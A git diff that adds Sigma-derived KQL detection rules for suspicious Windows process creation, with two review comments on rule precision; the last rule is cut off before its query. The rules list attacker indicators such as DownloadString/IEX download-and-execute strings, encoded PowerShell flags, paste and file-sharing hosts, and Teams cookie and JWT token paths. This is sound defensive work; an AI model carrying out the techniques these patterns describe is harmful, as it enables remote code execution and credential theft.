+| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (not((ProcessCommandLine contains " -u -p " and FolderPath endswith "\\werfault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_vscode.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_vscode.kql
new file mode 100644
index 00000000..7d42e55a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_vscode.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Child Process Of VsCode
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-26
+// Level: medium
+// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+// False Positives:
+// - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_winrar_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_winrar_exe.kql
new file mode 100644
index 00000000..ee470fcf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_winrar_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Child Process Of WinRAR.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-31
+// Level: medium
+// Description: Detects potentially suspicious child processes of WinRAR.exe.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\WinRAR.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_processes_spawned_by_conhost.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_processes_spawned_by_conhost.kql
new file mode 100644
index 00000000..7f7bb963
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_processes_spawned_by_conhost.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Child Processes Spawned by ConHost
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: high
+// Description: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1202, attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`.
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cmd.exe", "cscript.exe", "mshta.exe", "powershell_ise.exe", "powershell.exe", "pwsh.dll", "regsvr32.exe", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\conhost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_cmd_shell_output_redirect.kql b/KQL/rules/windows/process_creation/potentially_suspicious_cmd_shell_output_redirect.kql
new file mode 100644
index 00000000..996d8e1c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_cmd_shell_output_redirect.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious CMD Shell Output Redirect
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: medium
+// Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location.
+// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and (((ProcessCommandLine contains ">" and ProcessCommandLine contains "%APPDATA%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TEMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%USERPROFILE%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\ProgramData\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Temp\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Users\\Public\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Windows\\Temp\\")) or ((ProcessCommandLine contains " >" or ProcessCommandLine contains "\">" or ProcessCommandLine contains "'>") and (ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_command_targeting_teams_sensitive_files.kql b/KQL/rules/windows/process_creation/potentially_suspicious_command_targeting_teams_sensitive_files.kql
new file mode 100644
index 00000000..c7a80863
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_command_targeting_teams_sensitive_files.kql
@@ -0,0 +1,11 @@
+// Title: Potentially Suspicious Command Targeting Teams Sensitive Files
+// Author: @SerkinValery
+// Date: 2022-09-16
+// Level: medium
+// Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
+// The database might contain authentication tokens and other sensitive information about the logged in accounts.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Microsoft\\Teams\\Cookies" or ProcessCommandLine contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(FolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_desktop_background_change_using_reg_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_desktop_background_change_using_reg_exe.kql
new file mode 100644
index 00000000..41d7f565
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_desktop_background_change_using_reg_exe.kql
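Review bot: The only exclusion on the last line is the classic Teams install path, `not(FolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe")`, so any other binary that legitimately references these files (a newer Teams client, backup or migration tooling) will alert; whether that matters depends on the tenant and cannot be judged from the rule alone. Since the description already says "from a process other than Teams", a one-line comment above the query such as `// NOTE: exclusion covers the classic Teams binary only; extend it per environment before scheduling as an alert` would tell the analyst to tune it before deployment rather than after the first false positive.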
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious Desktop Background Change Using Reg.EXE
+// Author: Stephen Lincoln @slincoln-aiq (AttackIQ)
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
+// This is a common technique used by malware to change the desktop background to a ransom note or other image.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001
+// False Positives:
+// - Administrative scripts that change the desktop background to a company logo or other image.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_dll_registered_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_dll_registered_via_odbcconf_exe.kql
new file mode 100644
index 00000000..ad4ecb69
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_dll_registered_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious DLL Registered Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: high
+// Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "REGSVR " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_electron_application_commandline.kql b/KQL/rules/windows/process_creation/potentially_suspicious_electron_application_commandline.kql
new file mode 100644
index 00000000..2da6049e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_electron_application_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Electron Application CommandLine
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-05
+// Level: medium
+// Description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate usage for debugging purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--browser-subprocess-path" or ProcessCommandLine contains "--gpu-launcher" or ProcessCommandLine contains "--renderer-cmd-prefix" or ProcessCommandLine contains "--utility-cmd-prefix") and ((FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\code.exe" or FolderPath endswith "\\discord.exe" or FolderPath endswith "\\GitHubDesktop.exe" or FolderPath endswith "\\keybase.exe" or FolderPath endswith "\\msedge_proxy.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\slack.exe" or FolderPath endswith "\\Teams.exe") or (ProcessVersionInfoOriginalFileName in~ ("chrome.exe", "code.exe", "discord.exe", "GitHubDesktop.exe", "keybase.exe", "msedge_proxy.exe", "msedge.exe", "msedgewebview2.exe", "msteams.exe", "slack.exe", "Teams.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_event_viewer_child_process.kql b/KQL/rules/windows/process_creation/potentially_suspicious_event_viewer_child_process.kql
new file mode 100644
index 00000000..da91e6df
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_event_viewer_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Event Viewer Child Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-19
+// Level: high
+// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql b/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql
new file mode 100644
index 00000000..a3e98fd2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-09-09
+// Level: medium
+// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
+// This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.discovery, attack.t1552, attack.t1087
+// False Positives:
+// - Legitimate usage of the utility by administrators to query the event log
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "-InstanceId 462") or (ProcessCommandLine contains ".eventid -eq 462") or (ProcessCommandLine contains ".ID -eq 462") or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "System[EventID=462" and ProcessCommandLine contains "]") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains ".eventid -eq 4778" or ProcessCommandLine contains ".ID -eq 4778" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "System[EventID=4778]" or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains ".eventid -eq 25" or ProcessCommandLine contains ".ID -eq 25" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25") or ProcessCommandLine contains "System[EventID=25]" or ProcessCommandLine contains "-InstanceId 1149" or ProcessCommandLine contains ".eventid -eq 1149" or ProcessCommandLine contains ".ID -eq 1149" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "1149") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "1149") or ProcessCommandLine contains "System[EventID=1149]" or ProcessCommandLine contains "-InstanceId 21" or ProcessCommandLine contains ".eventid -eq 21" or ProcessCommandLine contains ".ID -eq 21" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "21") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "21") or ProcessCommandLine contains "System[EventID=21]" or ProcessCommandLine contains "-InstanceId 22" or ProcessCommandLine contains ".eventid -eq 22" or ProcessCommandLine contains ".ID -eq 22" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "22") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "22") or ProcessCommandLine contains "System[EventID=22]") or (ProcessCommandLine contains "Microsoft-Windows-PowerShell" or ProcessCommandLine contains "Microsoft-Windows-Security-Auditing" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-RemoteConnectionManager" or ProcessCommandLine contains "Microsoft-Windows-Windows Defender" or ProcessCommandLine contains "PowerShellCore" or ProcessCommandLine contains "Security" or ProcessCommandLine contains "Windows PowerShell")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_execution_from_parent_process_in_public_folder.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_from_parent_process_in_public_folder.kql
new file mode 100644
index 00000000..024f6650
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_execution_from_parent_process_in_public_folder.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Execution From Parent Process In Public Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1564, attack.t1059
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript")) and InitiatingProcessFolderPath contains ":\\Users\\Public\\"
\ No newline at end of file
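Review bot: In the `| where` clause of the EventLog recon hunk, paired terms such as `(ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "22")` and `(ProcessCommandLine contains "System[EventID=462" and ProcessCommandLine contains "]")` only require both fragments to appear somewhere in the command line, so a query for event 4622 satisfies the `22` branch and a `System[EventID=4624]` query satisfies the `462` branch. This looks like the converter splitting an upstream mid-string wildcard into two `contains` terms, which drops the adjacency the original pattern expressed; emitting `ProcessCommandLine matches regex @'EventCode=\d*22'` (constructed example) for that shape would keep it. The standalone `ProcessCommandLine contains "Security"` term in the log-name branch is likewise met by any command line containing that word, so the rule's precision rests almost entirely on the tool-name branch that follows. The public-folder hunk that follows on the same line does not share this issue.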
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_pdqdeployrunner.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_pdqdeployrunner.kql
new file mode 100644
index 00000000..34615381
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_pdqdeployrunner.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Execution Of PDQDeployRunner
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-22
+// Level: medium
+// Description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate use of the PDQDeploy tool to execute these commands
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\TEMP\\" or FolderPath contains "\\AppData\\Local\\Temp") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -encodedcommand " or ProcessCommandLine contains " -w hidden" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "http" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-")) and InitiatingProcessFolderPath contains "\\PDQDeployRunner-"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql
new file mode 100644
index 00000000..8212cce7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-25
+// Level: medium
+// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\") and ((FolderPath endswith "\\Regsvcs.exe" or FolderPath endswith "\\Regasm.exe") or (ProcessVersionInfoOriginalFileName in~ ("RegSvcs.exe", "RegAsm.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql
new file mode 100644
index 00000000..1e15f8da
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-13
+// Level: medium
+// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".dat" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".txt") and ((FolderPath endswith "\\Regsvcs.exe" or FolderPath endswith "\\Regasm.exe") or (ProcessVersionInfoOriginalFileName in~ ("RegSvcs.exe", "RegAsm.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql
new file mode 100644
index 00000000..a486363a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: high
+// Description: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_googleupdate_child_process.kql b/KQL/rules/windows/process_creation/potentially_suspicious_googleupdate_child_process.kql
new file mode 100644
index 00000000..d7aa77df
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_googleupdate_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious GoogleUpdate Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects potentially suspicious child processes of "GoogleUpdate.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" and (not((isnull(FolderPath) or (FolderPath contains "\\Google" or (FolderPath endswith "\\setup.exe" or FolderPath endswith "chrome_updater.exe" or FolderPath endswith "chrome_installer.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql b/KQL/rules/windows/process_creation/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql
new file mode 100644
index 00000000..78f70d80
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Inline JavaScript Execution via NodeJS Binary
+// Author: Microsoft (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-21
+// Level: medium
+// Description: Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.007
+// False Positives:
+// - Legitimate scripts using Node.js with these modules
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http" and ProcessCommandLine contains "execSync" and ProcessCommandLine contains "spawn" and ProcessCommandLine contains "fs" and ProcessCommandLine contains "path" and ProcessCommandLine contains "zlib") and (FolderPath endswith "\\node.exe" or ProcessVersionInfoOriginalFileName =~ "node.exe" or ProcessVersionInfoProductName =~ "Node.js")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_jwt_token_search_via_cli.kql b/KQL/rules/windows/process_creation/potentially_suspicious_jwt_token_search_via_cli.kql
new file mode 100644
index 00000000..c09efbd5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_jwt_token_search_via_cli.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious JWT Token Search Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems), kagebunsher
+// Date: 2022-10-25
+// Level: medium
+// Description: Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG".
+// JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others.
+// Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528, attack.t1552.001
+
+DeviceProcessEvents
